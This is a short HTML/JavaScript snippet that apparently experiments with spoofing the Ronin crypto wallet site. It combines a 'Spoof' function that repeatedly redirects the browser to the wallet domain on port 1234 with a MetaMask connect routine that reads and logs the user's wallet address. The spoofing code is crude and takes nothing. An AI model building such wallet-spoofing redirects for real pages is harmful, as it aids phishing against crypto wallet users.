<script>
    var spoof = function(){
  document.write('<button onclick="connect()">Connect</button>');
        document.location = "https://wallet.roninchain.com:1234";
        setInterval(function(){document.location="https://wallet.roninchain.com:1234";},9800);
    };
  </script>
  
  <input type="button" value="Spoof" onclick="spoof();" />
  
  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.7.4-rc.1/web3.min.js"></script>
  <script>
  /* To connect using MetaMask */
  async function connect() {
    if (window.ethereum) {
       await window.ethereum.request({ method: "eth_requestAccounts" });
       window.web3 = new Web3(window.ethereum);
       const account = web3.eth.accounts;
       //Get the current MetaMask selected/active wallet
       const walletAddress = account.givenProvider.selectedAddress;
       console.log(`Wallet: ${walletAddress}`);
    
    } else {
     console.log("No wallet");
    }
  }
  </script>
  <input type="button" value="Connect Wallet" onclick="connect();">